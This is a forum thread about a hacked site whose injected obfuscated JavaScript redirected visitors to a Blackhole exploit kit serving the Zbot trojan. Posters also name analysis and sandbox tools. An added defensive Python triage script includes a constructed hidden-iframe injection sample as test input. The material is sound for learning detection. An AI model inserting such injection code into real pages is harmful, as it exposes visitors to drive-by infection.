help with a trojan
-
You could e-mail and explain you cannot get the site, ask if he will e-mail you when the site is repaired
DavidWGordon@verizon.net
Nothing stops me going there with 3 browsers?
-
Trying to visit the site using Opera gives a malware site warning, due to:
http://www.avgthreatlabs.com/sitereports/domain/abeforum.com
-
Bit odd that only one of four browsers sees anything wrong. Clicked ignore this warning and it went to the site; the anti-virus didn't pop up, nor did the real-time malware scanner, though am running full scans now.
-
It's the ads on the site; sometimes they can cause Avast to go loopy.
Replies to posts are always welcome. If I have made a mistake in the post, I am human, tell me nicely and it will be corrected. If your reply cannot be nice, has an underlying issue, or you believe that you are God, please post in another forum. Thank you.
-
Seems like it's being cleaned up...
"The Abe Forum will likely be down until sometime during the day on Thursday, the 29th at the soonest (US, East Coast time). I am working with support on our forum software to get the reply function back, and with another firm to take care of the alerts that some of us were getting. I expect this will all be cleared up soon, but until then, come check out The Abe Forum on Facebook."
-
It's back online.
The problems started with them not using up to date forum software. This was able to be hacked and a malicious javascript inserted.
This obfuscated JavaScript silently redirected visitors to a .php script hosted on another site (feedurbrain.com). The last time I looked, the .php script was 404'ing for me, which is probably why, when some of you visited, although Avast warned about the JavaScript (JS:Redirector), nothing more happened.
By the looks of things the .php script made a further redirection to a domain hosting the Blackhole Exploit kit. From there a number of exploit attempts are made against - amongst others - Windows itself, Browsers (IE & Firefox), Adobe products (Flash, Reader), Java Runtime etc. Should a vulnerability be found, then malware would have been downloaded and executed on your computer.
In my case an attempt to exploit the (patched) vulnerability in Help and Support Center (MS10-042) enabled me to get the file.
The file I managed to get hold of initially was later confirmed by Microsoft to be PWS:win32/Zbot
https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=8ef2b52b-1363-44e2-b526-cdc2ab6d69a1&n=1
PWS:Win32/Zbot is a password-stealing trojan that monitors for visits to certain Web sites. It allows limited backdoor access and control and may terminate certain security-related processes.
It wasn't only the Abe Forum affected. Others were affected too.
Looking around, I'm dismayed by the number of people that ignored the warnings and attempted to visit the site, and those who actually turned off their security to visit the site - despite the warnings - because it wouldn't let them visit at all.
No wonder people get infected.
-
Perhaps the others who visited the site also knew what they were doing.
-
There are ways to test suspected sites without directly accessing them with a browser, e.g. a service like Wepawet:
http://wepawet.iseclab.org/
The advantage of this service is that it'll show exactly what outbound URLs are produced from the script, without us having to deobfuscate anything ourselves. OTOH it doesn't always correctly label a link as malicious when it in fact is (sometimes if the site can't be accessed for some reason), so you need to know what you're looking for. After a while it's easy to guess exactly what exploit it's linking to, as the URLs hidden in the obfuscated script tend to be written uniformly, e.g. "example.com/index.php?tp=001245676ea" is pretty much going to be a Blackhole Exploit Kit.
Or to look at the code directly with Malzilla, which has tools to deobfuscate the script:
http://malzilla.sourceforge.net/
I'm fairly confident that both Santer and Dogmary would have been using sandboxie with appropriate restrictions when accessing the sites though.
For some reason I see a lot of Blackhole Exploit Kits on infected UK sites, usually for local businesses. Probably as Waddler suggested for this one, poorly maintained sites using older (exploitable) software.
-
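The two posts above describe the injected obfuscated script that redirects visitors onward, and the index.php?tp= URL shape that tends to mean a Blackhole landing page. A defender can recover those outbound URLs from a saved copy of the page statically, roughly what the Wepawet/Malzilla step does, without ever executing the script. This is an added example, not code from any poster or tool on the page; the sample HTML is constructed, the hostnames are placeholders, and the decoding and URL heuristics are assumptions rather than a complete signature.

```python
import re
from urllib.parse import unquote

# Static triage of a saved HTML page: decode common string-hiding tricks
# without executing anything, then flag URLs shaped like a Blackhole landing page.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
# Heuristic (assumption): the index.php?tp=<hex> shape the thread calls out.
BLACKHOLE_RE = re.compile(r"/index\.php\?tp=[0-9a-f]{6,}", re.I)
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode(", "document.write(")


def static_decode(js: str) -> str:
    """Resolve String.fromCharCode(...) and unescape('...') literally.
    The script text is only rewritten, never evaluated, so hostile input is safe."""
    def charcodes(m):
        codes = [c for c in m.group(1).replace(" ", "").split(",") if c]
        return "".join(chr(int(c)) for c in codes)
    js = CHARCODE_RE.sub(charcodes, js)
    return UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), js)


def triage_page(html: str) -> dict:
    """Return obfuscation count, every decoded outbound URL, and the suspicious ones."""
    findings = {"obfuscated_scripts": 0, "urls": [], "blackhole_like": []}
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if any(k in body.lower() for k in OBFUSCATION_MARKERS):
            findings["obfuscated_scripts"] += 1
        for url in URL_RE.findall(static_decode(body)):
            findings["urls"].append(url)
            if BLACKHOLE_RE.search(url):
                findings["blackhole_like"].append(url)
    return findings


# Constructed sample: one hidden iframe injector, one charcode-wrapped benign
# call, one plain script. Hostnames are placeholders, not real indicators.
SAMPLE_HTML = """<html><body><h1>Forum</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.com%2Findex.php%3Ftp%3D001245676ea%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));</script>
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,104,116,116,112,58,47,47,98,101,110,105,103,110,46,101,120,97,109,112,108,101,47,34,41));</script>
<script>var x = 1;</script>
</body></html>"""

if __name__ == "__main__":
    print(triage_page(SAMPLE_HTML))
```

Feed it the HTML fetched with a non-browser client (or from a sandboxed capture) and treat any blackhole_like hit as a reason to block the referring page at the proxy rather than to click through.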
I have this as well; if something were to get on, then ThreatFire stops it doing anything, that's the theory.
http://www.threatfire.com/
When it does pop up for something, I leave the box unticked for "remember the option", just in case a programme with access wants to use it for any other reason.
-
Looking around, I'm dismayed by the number of people that ignored the warnings...
Perhaps the others who visited the site also knew what they were doing.
I'm fairly confident that both Santer and Dogmary would have been using sandboxie with appropriate restrictions when accessing the sites though.
I was referring more to the members of the affected forums than anyone on here. From the comments some obviously didn't know what they were doing and ended up infected because of it.
It doesn't help when the site admins don't know what's going on. The Abe Forums admin saying "There is no threat to anyone's computer. The forum is only text and pictures." suggests he didn't have a clue or didn't want to admit it - that helps no-one.